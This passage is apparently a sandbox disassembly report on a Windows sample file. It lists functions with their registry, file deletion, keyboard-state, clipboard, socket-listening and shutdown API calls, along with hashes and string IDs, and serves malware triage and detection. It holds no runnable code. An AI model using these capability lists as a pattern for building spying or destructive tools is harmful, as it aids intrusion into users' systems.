                                              • String ID: 0D>$0E>$0F>$3c5$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$csd2e6tcsd8e6tcsdbe6tcsd4e6tcsd5e6tcsdee6tcsd4e6tcsd5e6tcsd0e6tcsd8e6tcsdbe6tcsd4e6tcsdde6tcsdfe6tcsd8e6tcsd5e6tcsd1e6tcsd8e6tcsdb$pG>$_5
                                              • API String ID: 0-300307796
                                              • Opcode ID: 9bb2de73420199f05d5f8bc667b868f48940881e865b30b332cffcb08809946b
                                              • Instruction ID: f06de2abe21fe81f4a08969e224642d17ecab9a997c793b2c82db166ae341fb5
                                              • Opcode Fuzzy Hash: 9bb2de73420199f05d5f8bc667b868f48940881e865b30b332cffcb08809946b
                                              • Instruction Fuzzy Hash: 8D727075E0021A9BDF16CF59C881BAEB7B5FF48310F55816AE805FB690E7309E85CB90
                                              APIs
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003C0953
                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,003CF910,00000000,?,00000000,?,?), ref: 003C09C1
                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003C0A09
                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003C0A92
                                              • RegCloseKey.ADVAPI32(?), ref: 003C0DB2
                                              • RegCloseKey.ADVAPI32(00000000), ref: 003C0DBF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Close$ConnectCreateRegistryValue
                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                              • API String ID: 536824911-966354055
                                              • Opcode ID: d08a657bab6b3d3f6027fb628c8e1093da9d674af4184efb9493d36125e6e7a9
                                              • Instruction ID: 4956a700ae72bc36828af50130498971e7eec188834f4b791a9b4443a078b77e
                                              • Opcode Fuzzy Hash: d08a657bab6b3d3f6027fb628c8e1093da9d674af4184efb9493d36125e6e7a9
                                              • Instruction Fuzzy Hash: 640225756006519FCB16EF28C845E2AB7E5EF89710F05885DF88A9F262CB31FC41CB81
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 003AF113
                                              • _wcscmp.LIBCMT ref: 003AF128
                                              • _wcscmp.LIBCMT ref: 003AF13F
                                                • Part of subcall function 003A4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003A43A0
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 003AF16E
                                              • FindClose.KERNEL32(00000000), ref: 003AF179
                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 003AF195
                                              • _wcscmp.LIBCMT ref: 003AF1BC
                                              • _wcscmp.LIBCMT ref: 003AF1D3
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 003AF1E5
                                              • SetCurrentDirectoryW.KERNEL32(003F8920), ref: 003AF203
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 003AF20D
                                              • FindClose.KERNEL32(00000000), ref: 003AF21A
                                              • FindClose.KERNEL32(00000000), ref: 003AF22C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                              • String ID: *.*
                                              • API String ID: 1824444939-438819550
                                              • Opcode ID: 4dac008f8eed7ccffb533da1c902320119bc1aa0334a1edf778f53856a95cb50
                                              • Instruction ID: 7016533af811cbc2aca2673339153cf5ad3aa2ec515d4b8d3c828020e53dc552
                                              • Opcode Fuzzy Hash: 4dac008f8eed7ccffb533da1c902320119bc1aa0334a1edf778f53856a95cb50
                                              • Instruction Fuzzy Hash: 9231CE3A50021DAECB26ABA4EC49FEE77ADDF86360F114575E900E30A0DB70DE45CB64
                                              APIs
                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003AA20F
                                              • __swprintf.LIBCMT ref: 003AA231
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 003AA26E
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 003AA293
                                              • _memset.LIBCMT ref: 003AA2B2
                                              • _wcsncpy.LIBCMT ref: 003AA2EE
                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 003AA323
                                              • CloseHandle.KERNEL32(00000000), ref: 003AA32E
                                              • RemoveDirectoryW.KERNEL32(?), ref: 003AA337
                                              • CloseHandle.KERNEL32(00000000), ref: 003AA341
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                              • String ID: :$\$\??\%s
                                              • API String ID: 2733774712-3457252023
                                              • Opcode ID: b939e1d002bd0a31e2cf44611d6e05ab3797fd2b39f008baea8dd89fb2212425
                                              • Instruction ID: 45e6b2d6c483cc2b822ff0170667f2a1cd062632921dbb44b83b3abb4199eda3
                                              • Opcode Fuzzy Hash: b939e1d002bd0a31e2cf44611d6e05ab3797fd2b39f008baea8dd89fb2212425
                                              • Instruction Fuzzy Hash: BC31E8B6500109ABDB22DFA0DC45FEB77BDEF89740F1040B6F508D61A0E7749644CB25
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 003A0097
                                              • SetKeyboardState.USER32(?), ref: 003A0102
                                              • GetAsyncKeyState.USER32(000000A0), ref: 003A0122
                                              • GetKeyState.USER32(000000A0), ref: 003A0139
                                              • GetAsyncKeyState.USER32(000000A1), ref: 003A0168
                                              • GetKeyState.USER32(000000A1), ref: 003A0179
                                              • GetAsyncKeyState.USER32(00000011), ref: 003A01A5
                                              • GetKeyState.USER32(00000011), ref: 003A01B3
                                              • GetAsyncKeyState.USER32(00000012), ref: 003A01DC
                                              • GetKeyState.USER32(00000012), ref: 003A01EA
                                              • GetAsyncKeyState.USER32(0000005B), ref: 003A0213
                                              • GetKeyState.USER32(0000005B), ref: 003A0221
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              • Opcode ID: 5d8d1a0bc4d060ea4bea87759d2d08d021f6a4932f0c9c969833fbbdcb824733
                                              • Instruction ID: 152f41aedeb8f06eaf4a428a2a135e2c93c257d20365ebedccb6e63d60b88274
                                              • Opcode Fuzzy Hash: 5d8d1a0bc4d060ea4bea87759d2d08d021f6a4932f0c9c969833fbbdcb824733
                                              • Instruction Fuzzy Hash: 6F51C92490478829FB3ADBB088547EABFB4DF13380F09459E95C25B5C2DAA49B8CC761
                                              APIs
                                                • Part of subcall function 003C0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BFDAD,?,?), ref: 003C0E31
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003C04AC
                                                • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003C054B
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003C05E3
                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003C0822
                                              • RegCloseKey.ADVAPI32(00000000), ref: 003C082F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                              • String ID:
                                              • API String ID: 1240663315-0
                                              • Opcode ID: 8478b915d50258c98a383d8d5ff2452c3b27f6ec5b8f89f2233764b81742d87f
                                              • Instruction ID: be84b923518846715e36967f827d6afd6cc1f4a1ccd06d06428122564bc95c40
                                              • Opcode Fuzzy Hash: 8478b915d50258c98a383d8d5ff2452c3b27f6ec5b8f89f2233764b81742d87f
                                              • Instruction Fuzzy Hash: 2FE14D71604210EFCB1ADF28C891E6BBBE9EF89714F04856DF84ADB261D631ED01CB91
                                              APIs
                                                • Part of subcall function 00349837: __itow.LIBCMT ref: 00349862
                                                • Part of subcall function 00349837: __swprintf.LIBCMT ref: 003498AC
                                              • CoInitialize.OLE32 ref: 003B8403
                                              • CoUninitialize.OLE32 ref: 003B840E
                                              • CoCreateInstance.OLE32(?,00000000,00000017,003D2BEC,?), ref: 003B846E
                                              • IIDFromString.OLE32(?,?), ref: 003B84E1
                                              • VariantInit.OLEAUT32(?), ref: 003B857B
                                              • VariantClear.OLEAUT32(?), ref: 003B85DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                              • API String ID: 834269672-1287834457
                                              • Opcode ID: 28b59e0d0c7e98bb8339ef2a136e1f4f35e58561fbd893f940d8e21192ce775c
                                              • Instruction ID: e72ff2bd9cfde0abdb3549dda4d92c06eb2c31120737a205ef775898ed27e5fd
                                              • Opcode Fuzzy Hash: 28b59e0d0c7e98bb8339ef2a136e1f4f35e58561fbd893f940d8e21192ce775c
                                              • Instruction Fuzzy Hash: D66180706083129FC712DF55C849FABB7ECAF4A758F04481AFA859B691CB70ED44CB92
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                              • String ID:
                                              • API String ID: 1737998785-0
                                              • Opcode ID: e83036685b9d00f2d0ff837994a090dc768155fb7983312ca1b0e5822975f5e1
                                              • Instruction ID: 843f03bd0b9c749671f90cd4a28287cb5282ea7c9ad9f570742b0f408282bb15
                                              • Opcode Fuzzy Hash: e83036685b9d00f2d0ff837994a090dc768155fb7983312ca1b0e5822975f5e1
                                              • Instruction Fuzzy Hash: 092194356002109FDB129F14EC09F6A7BADEF45715F11802AFA46DF262DB30BC00CB58
                                              APIs
                                                • Part of subcall function 00344750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00344743,?,?,003437AE,?), ref: 00344770
                                                • Part of subcall function 003A4A31: GetFileAttributesW.KERNEL32(?,003A370B), ref: 003A4A32
                                              • FindFirstFileW.KERNEL32(?,?), ref: 003A38A3
                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 003A394B
                                              • MoveFileW.KERNEL32(?,?), ref: 003A395E
                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 003A397B
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 003A399D
                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 003A39B9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 4002782344-1173974218
                                              • Opcode ID: 5897b18ce30b67085a039bbce9204f006625f446e927a547a06713462d41191b
                                              • Instruction ID: 5a9371111f1fef8e9f32a29315cb323ace065189e05b8e56062a1ebc9b4e5484
                                              • Opcode Fuzzy Hash: 5897b18ce30b67085a039bbce9204f006625f446e927a547a06713462d41191b
                                              • Instruction Fuzzy Hash: AE51403180514CAACF17EBA0D992AEEB7B9EF16300F604069F405BF192EB756F09CB51
                                              APIs
                                                • Part of subcall function 00347DE1: _memmove.LIBCMT ref: 00347E22
                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 003AF440
                                              • Sleep.KERNEL32(0000000A), ref: 003AF470
                                              • _wcscmp.LIBCMT ref: 003AF484
                                              • _wcscmp.LIBCMT ref: 003AF49F
                                              • FindNextFileW.KERNEL32(?,?), ref: 003AF53D
                                              • FindClose.KERNEL32(00000000), ref: 003AF553
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                              • String ID: *.*
                                              • API String ID: 713712311-438819550
                                              • Opcode ID: 37517ebb45e765469afbd4c3b8618f308a9ddd5b1e3ba308d2156308f59f7271
                                              • Instruction ID: 7ae5307919725a20b874b881e3e14151a90e729a44463508ea64ec86faac4e9c
                                              • Opcode Fuzzy Hash: 37517ebb45e765469afbd4c3b8618f308a9ddd5b1e3ba308d2156308f59f7271
                                              • Instruction Fuzzy Hash: 73415C71D0021AAFCF16EFA4CC55AEEBBB8FF06310F144566E815AB191DB30AE44CB50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: __itow__swprintf
                                              • String ID: 3c5$_5
                                              • API String ID: 674341424-2150917133
                                              • Opcode ID: bc34a19a84a461b33d33785b646bde63d7adea950bcf38303d39cb9b2fdb5079
                                              • Instruction ID: 98730d50eeef9dc74cad0fc4e75d339c630f8f743fb25bcb444419bf081989f2
                                              • Opcode Fuzzy Hash: bc34a19a84a461b33d33785b646bde63d7adea950bcf38303d39cb9b2fdb5079
                                              • Instruction Fuzzy Hash: E02291716083009FC726DF24C892F6FB7E5AF84750F11491DF99A9B2A1DB71E908CB92
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID:
                                              • API String ID: 4104443479-0
                                              • Opcode ID: 32c8398df9ba0a80f54d157533262257c84043af1cd21f79406cfdbb5cca7836
                                              • Instruction ID: 064358e13f1369677c205485b69cc8ada8c74a35a1a5a3f524c3a01733d4a048
                                              • Opcode Fuzzy Hash: 32c8398df9ba0a80f54d157533262257c84043af1cd21f79406cfdbb5cca7836
                                              • Instruction Fuzzy Hash: A7128F70A00609DFDF0ADFA5D991AAEB7F5FF48310F104529E846EB261EB36AD14CB50
                                              APIs
                                                • Part of subcall function 00344750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00344743,?,?,003437AE,?), ref: 00344770
                                                • Part of subcall function 003A4A31: GetFileAttributesW.KERNEL32(?,003A370B), ref: 003A4A32
                                              • FindFirstFileW.KERNEL32(?,?), ref: 003A3B89
                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 003A3BD9
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 003A3BEA
                                              • FindClose.KERNEL32(00000000), ref: 003A3C01
                                              • FindClose.KERNEL32(00000000), ref: 003A3C0A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 2649000838-1173974218
                                              • Opcode ID: f5bab947efad50e289f0705d15344e14c441b4636a1082fd467e321fa8629050
                                              • Instruction ID: ec5f79c0760c7d230123f896d05f67ddadd1895dd0c99070a38c77fae077b5cb
                                              • Opcode Fuzzy Hash: f5bab947efad50e289f0705d15344e14c441b4636a1082fd467e321fa8629050
                                              • Instruction Fuzzy Hash: F0317035008385AFC302EF24C891DAFB7EDAE92314F404D2DF4D59A192EB25EA09C763
                                              APIs
                                                • Part of subcall function 003987E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0039882B
                                                • Part of subcall function 003987E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00398858
                                                • Part of subcall function 003987E1: GetLastError.KERNEL32 ref: 00398865
                                              • ExitWindowsEx.USER32(?,00000000), ref: 003A51F9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                              • String ID: $@$SeShutdownPrivilege
                                              • API String ID: 2234035333-194228
                                              • Opcode ID: f7f42be1082fde7c0280a66aff791ab93001828b980e6cbc86213e37ef230e39
                                              • Instruction ID: 7074c90540551c7757965a1c90def602ee5de36ae80d1920e15e19e91696c3ca
                                              • Opcode Fuzzy Hash: f7f42be1082fde7c0280a66aff791ab93001828b980e6cbc86213e37ef230e39
                                              • Instruction Fuzzy Hash: FE01F7316916156BEB2F63689C8AFBA725CEB07750F210C20F913E60D2D9516C008690
                                              APIs
                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003B62DC
                                              • WSAGetLastError.WSOCK32(00000000), ref: 003B62EB
                                              • bind.WSOCK32(00000000,?,00000010), ref: 003B6307
                                              • listen.WSOCK32(00000000,00000005), ref: 003B6316
                                              • WSAGetLastError.WSOCK32(00000000), ref: 003B6330
                                              • closesocket.WSOCK32(00000000,00000000), ref: 003B6344
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                              • String ID:
                                              • API String ID: 1279440585-0
                                              • Opcode ID: 57372b381d0d17761c55210a35a42f63c800b00182e8cb9d4119ca7c093046ff
                                              • Instruction ID: 6c37d2231a1ca45ce9e08ce1d6240b0282731a7405135f36895ef4abdd2feca7
                                              • Opcode Fuzzy Hash: 57372b381d0d17761c55210a35a42f63c800b00182e8cb9d4119ca7c093046ff
                                              • Instruction Fuzzy Hash: 1B21D0346002009FCB12EF68CC46FAEB7E9EF49324F154159E91AEB3A2C770AC01CB51
                                              APIs
                                                • Part of subcall function 00360DB6: std::exception::exception.LIBCMT ref: 00360DEC
                                                • Part of subcall function 00360DB6: __CxxThrowException@8.LIBCMT ref: 00360E01
                                              • _memmove.LIBCMT ref: 00390258
                                              • _memmove.LIBCMT ref: 0039036D
                                              • _memmove.LIBCMT ref: 00390414
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                                              • String ID:
                                              • API String ID: 1300846289-0
                                              • Opcode ID: 1fe8ec0c59a20b296bf73affe28c16c489024909c254d2871fc483811456da7b
                                              • Instruction ID: f772f7c024799d717d963039d51ddca204a6910f54879d3a46a8c7880d749836
                                              • Opcode Fuzzy Hash: 1fe8ec0c59a20b296bf73affe28c16c489024909c254d2871fc483811456da7b
                                              • Instruction Fuzzy Hash: 3202B0B0A00209DFCF0ADF64D992AAE7BF9EF44300F158469E806DF255EB35E954CB91
                                              APIs
